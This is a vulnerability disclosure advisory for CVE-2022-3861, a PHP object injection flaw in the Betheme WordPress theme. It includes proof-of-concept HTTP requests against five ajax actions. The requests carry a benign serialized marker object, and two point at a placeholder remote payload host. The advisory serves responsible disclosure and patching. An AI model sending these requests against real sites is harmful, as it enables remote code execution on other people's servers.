Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
advisories/CVEs/CVE-2022-3861.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
161 lines (120 sloc)
4.79 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RCE Security Advisory | |
| https://www.rcesecurity.com | |
| 1. ADVISORY INFORMATION | |
| ======================= | |
| Product: Betheme | |
| Vendor URL: https://muffingroup.com/betheme/ | |
| Type: Deserialization of Untrusted Data [CWE-502] | |
| Date found: 2022-11-02 | |
| Date published: 2022-11-18 | |
| CVSSv3 Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) | |
| CVE: CVE-2022-3861 | |
| 2. CREDITS | |
| ========== | |
| This vulnerability was discovered and researched by Julien Ahrens from | |
| RCE Security. | |
| 3. VERSIONS AFFECTED | |
| ==================== | |
| BeTheme 26.5.1.4 and below | |
| 4. INTRODUCTION | |
| =============== | |
| Ever since Betheme was just an idea, we knew that it would be different from all | |
| other multipurpose WordPress themes we’d tried before. | |
| We wanted to build something more than just another WordPress theme, that could | |
| easily adapt to any project you need to work on without writing any code. A theme | |
| designed from scratch to save your time & help you enjoy your freedom... | |
| (from the vendor's homepage) | |
| 5. VULNERABILITY DETAILS | |
| ======================== | |
| The WordPress theme is vulnerable to multiple PHP Object injections when processing | |
| input to multiple, privileged Wordpress ajax routes: | |
| -mfn_builder_import -> "mfn-items-import" parameter | |
| -mfn_builder_import_page -> "mfn-items-import-page" parameter | |
| -importdata -> "import" parameter | |
| -importsinglepage -> "import" parameter | |
| -importfromclipboard -> "import" parameter | |
| To successfully exploit this vulnerability, an attacker must be authenticated with at | |
| least Wordpress "Contributer" rights. | |
| Successful exploits can allow the attacker to execute arbitrary code. | |
| 6. PROOF OF CONCEPT | |
| =================== | |
| To exploit the "mfn_builder_import" ajax action, use: | |
| POST /wp-admin/admin-ajax.php HTTP/1.1 | |
| Host: localhost | |
| Content-Length: 75 | |
| Accept: */* | |
| X-Requested-With: XMLHttpRequest | |
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) | |
| Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | |
| Accept-Encoding: gzip, deflate | |
| Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 | |
| Cookie: [your-auth-cookies] | |
| Connection: close | |
| mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30= | |
| To exploit the "mfn_builder_import_page" ajax action, use: | |
| POST /wp-admin/admin-ajax.php HTTP/1.1 | |
| Host: localhost | |
| Content-Length: 123 | |
| Accept: */* | |
| X-Requested-With: XMLHttpRequest | |
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) | |
| Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | |
| Accept-Encoding: gzip, deflate | |
| Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 | |
| Cookie: [your-auth-cookies] | |
| Connection: close | |
| mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/ | |
| To exploit the "importdata" ajax action, use: | |
| POST /wp-admin/admin-ajax.php HTTP/1.1 | |
| Host: localhost | |
| Content-Length: 114 | |
| Accept: */* | |
| X-Requested-With: XMLHttpRequest | |
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) | |
| Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | |
| Accept-Encoding: gzip, deflate | |
| Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 | |
| Cookie: [your-auth-cookies] | |
| Connection: close | |
| mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30= | |
| To exploit the "importsinglepage" ajax action, use: | |
| POST /wp-admin/admin-ajax.php HTTP/1.1 | |
| Host: localhost | |
| Content-Length: 83 | |
| Accept: */* | |
| X-Requested-With: XMLHttpRequest | |
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) | |
| Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | |
| Accept-Encoding: gzip, deflate | |
| Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 | |
| Cookie: [your-auth-cookies] | |
| Connection: close | |
| mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/ | |
| To exploit the "importfromclipboard" ajax action, use: | |
| POST /wp-admin/admin-ajax.php HTTP/1.1 | |
| Host: localhost | |
| Content-Length: 123 | |
| Accept: */* | |
| X-Requested-With: XMLHttpRequest | |
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) | |
| Content-Type: application/x-www-form-urlencoded; charset=UTF-8 | |
| Accept-Encoding: gzip, deflate | |
| Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 | |
| Cookie: [your-auth-cookies] | |
| Connection: close | |
| mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30= | |
| 7. SOLUTION | |
| =========== | |
| Update to version 26.6 | |
| 8. REPORT TIMELINE | |
| ================== | |
| 2022-11-01: Discovery of the vulnerability | |
| 2022-11-03: CVE requested from Wordfence (CNA) | |
| 2022-11-04: Wordfence assigns CVE-2022-3861 | |
| 2022-11-08: Vendor notification | |
| 2022-11-08: Opened up a security support case on envato.com since the vendor usually doesn't respond | |
| 2022-11-16: Envato responds stating that the vendor released 26.6 which fixes this vulnerability | |
| 2022-11-18: Public disclosure | |
| 9. REFERENCES | |
| ============= | |
| https://github.com/MrTuxracer/advisories |